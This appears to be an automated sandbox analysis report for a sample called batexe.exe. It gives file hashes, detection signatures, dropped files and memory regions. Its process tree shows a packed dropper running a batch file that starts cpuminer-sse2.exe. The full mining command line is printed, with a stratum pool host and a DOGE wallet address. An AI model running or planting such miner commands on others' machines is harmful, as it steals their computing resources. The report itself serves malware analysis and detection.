Analysis

  • max time kernel
    294s
  • max time network
    302s
  • platform
    windows10-1703_x64
  • resource
    win10-20240214-ja
  • resource tags

    arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    18-02-2024 16:52

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4588
    • C:\Users\Admin\AppData\Local\Temp\DEF6.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\DEF6.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\DEF6.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1472
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E3A9.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4564
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3572

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\DEF6.tmp\b2e.exe

    Filesize

    3.1MB

    MD5

    bd62949b6f7f0437271f33f0bd9eb6f7

    SHA1

    7ff46380bb93ee2af24a68dbc30eb9ed6352e12b

    SHA256

    c0b23acf1e3606a68fab787ad29e88e63790f5ead9e632e4d490cf67d60b09bc

    SHA512

    e2b5071c6fe21b2d63b65ca08bdeb62bda36165210934d86933b601e8618e4f4fc8d90725e9e591bad8cba8a5f15e3885c0b57d6afaceb4b380db999e267d67c

  • C:\Users\Admin\AppData\Local\Temp\DEF6.tmp\b2e.exe

    Filesize

    1.5MB

    MD5

    2a089e8bf6578017b5c976d0dacec1b8

    SHA1

    111f721c4eb9edb2555114a6c8d95d0bac6bf333

    SHA256

    7c38ff410d155d55353f7c8d0ccda5c2f63a97eadff37a99228b2cff8efddb50

    SHA512

    5efbe1daa3034284f68f7045fbbd4e26276165f60dca93d455772d5727deaf9ebc059a8b7b0763c6d00243fc8bbff9a197556837e71a1ecfd71e6919b8a7ecfe

  • C:\Users\Admin\AppData\Local\Temp\E3A9.tmp\batchfile.bat

    Filesize

    136B

    MD5

    8ea7ac72a10251ecfb42ef4a88bd330a

    SHA1

    c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

    SHA256

    65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

    SHA512

    a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    1.6MB

    MD5

    51a57c612d315cd4202df8e75c1013da

    SHA1

    e58bc6db0f4c9dd680e300cdc660210316ebcf19

    SHA256

    7652861f498ad81f347beb2197d0ecd193ddf5645d018e533e840c0765b22b8f

    SHA512

    cb9b55ca097de0bbec9360f7450cceee0d7c307feb81f59ef0b6caada1cf2862d494a52e3c8eb33a8d894be076298433dbe83ff936feea953c560accfcadb675

  • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

    Filesize

    2.3MB

    MD5

    4c04147c386ba8792ac6a03069572a8a

    SHA1

    dda67789fc1d0f2469ca95f01a5c81034853ca6a

    SHA256

    c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

    SHA512

    a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

  • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    448KB

    MD5

    19a61444b6e2d01755ede80960bca19c

    SHA1

    e0c7222784d3e2b3329ec3280648b17fd60ef209

    SHA256

    13fd488b38f3b75438e9ad0a033df005cd397f3c92f43275714a0a7eb3fb4db8

    SHA512

    bc02c82bdac19f10f3e3a93d3f507bb7838c9255b7cff5af6e3a7f3b471dae9c45c52728c3c23857b3402dd1702cb51a20f225a4da992c26a997c26d86b6b1d9

  • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    448KB

    MD5

    8185100383d0fe360c9198e5a883b08d

    SHA1

    ab398c469573f8e84d3cfcef01287a0604d6ab5f

    SHA256

    05ef7288b0d559bf67c3d69c201da9bdcaed0b49ecc538640f7b96c5b82eb538

    SHA512

    24930ef0caa1f2db2ed60f7dfdb832a172cf7747b0a336b051f73c0087a5f2fabff721487cb49cf5a3bc2be5426554b0a3a0e51541b6a4ca735646af24f1404a

  • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    448KB

    MD5

    ca123cec7f705c0af114e462349dc686

    SHA1

    75f90b4d95f6774b2f66e4ba790755ef118ab222

    SHA256

    7f141cdc0be9c965e21310bcfb0484b20d31ffd8a6a970f8b5a53c0e8974798a

    SHA512

    650125faa9ae6733f1118caf3101ca6850473f78f9bfc3a87e908eac1c69935e3bc269ffb5de4dd6e867429c1af35c7f3b9e62eb698fa7c9695d68e7115f3f1c

  • C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    320KB

    MD5

    1ae43cc09627ff82d15527ea2693fd76

    SHA1

    c39ffa1a4b80c29fa1f5caed3e7d091253266c66

    SHA256

    b63980c9d592a6d0d8521f74bd4c6f7cc4ae5f8c3320d2bd63764c56648ac45f

    SHA512

    21945e4e2fad3ee2b2a19d19bbbc1ada832c33a0d3bf499d6ac8f093b39021323ea0f7df3d54167a3456cbaf01ff126a6e6abbe17dd4eb8d5a24ca000888c271

  • \Users\Admin\AppData\Local\Temp\libcurl-4.dll

    Filesize

    512KB

    MD5

    a5993c0dd7587f1716037dcfe1f63091

    SHA1

    9a4d23ce36f5fc5791692b47d977c0bf92842879

    SHA256

    568cec1e1bdccf401232a78c8ecf2081fdaea221f0a7c777a69ec61307cca3e3

    SHA512

    c5457590162dc1a0fd6b179ba94f19e6265e2ca226ea1ec553358f568690bbc158335ee92c297ce699b2928d44702733269f82640d86bb499c1981a5903afc12

  • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

    Filesize

    320KB

    MD5

    e63bf5df87e2ea807dc353cc5aa9aab1

    SHA1

    69fc94bbebe878711cb133c3a1affb80c0bdecff

    SHA256

    2c9d6315f90367b959d3c32badd99bbc03eb808e4a46db72ccf2e81788b41533

    SHA512

    70f2b2a8a4c8ab23d81266cd23b75c27ced29a1eab8c80d95c57b595b10254b7229cc03b637716edbfad2a83827f2c557847b98d1de80256beec05c9512ee4bd

  • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

    Filesize

    128KB

    MD5

    9746d1ac79c8b499d8b2224394581fa7

    SHA1

    36b1985eabfd8131ad9f2b7f69c903a3fce67629

    SHA256

    77941fbe96e0c797e6cf5419ee32bd3fcee69629cba37750146656a660c37182

    SHA512

    61a6174e2aced5b85cd614ad2f9d3da24c6b91e1fc04e10ff818222c4323cd043a59708bd35af0de84b004bf492fbc157d72907cd1e7ddf7082fc2a3563ef183

  • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

    Filesize

    256KB

    MD5

    eca0c37eee65c31b869788d5d0bf00cd

    SHA1

    33a5c0cd2f0a7296a5c0169699ed8e065b57e5e8

    SHA256

    1d2b7bd4ddd99d627d5111252baadf028dc9910cf414892867502e5951de962e

    SHA512

    5f302da7772fca0a6d03ffd8732850f526acf5fcc33e189d2d906a33101454d970d5cca2f829a006d15c4a857341d72c7876cb2e7af84ada4f158695aba5a4dc

  • memory/1472-50-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/1472-5-0x0000000000400000-0x0000000000405000-memory.dmp

    Filesize

    20KB

  • memory/3572-42-0x0000000061440000-0x000000006156B000-memory.dmp

    Filesize

    1.2MB

  • memory/3572-51-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3572-96-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3572-43-0x0000000066D30000-0x0000000066DC8000-memory.dmp

    Filesize

    608KB

  • memory/3572-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

    Filesize

    24.7MB

  • memory/3572-45-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3572-40-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3572-41-0x0000000070800000-0x00000000708BC000-memory.dmp

    Filesize

    752KB

  • memory/3572-61-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3572-66-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3572-76-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3572-81-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/3572-91-0x0000000000400000-0x0000000000667000-memory.dmp

    Filesize

    2.4MB

  • memory/4588-6-0x0000000000400000-0x000000000393A000-memory.dmp

    Filesize

    53.2MB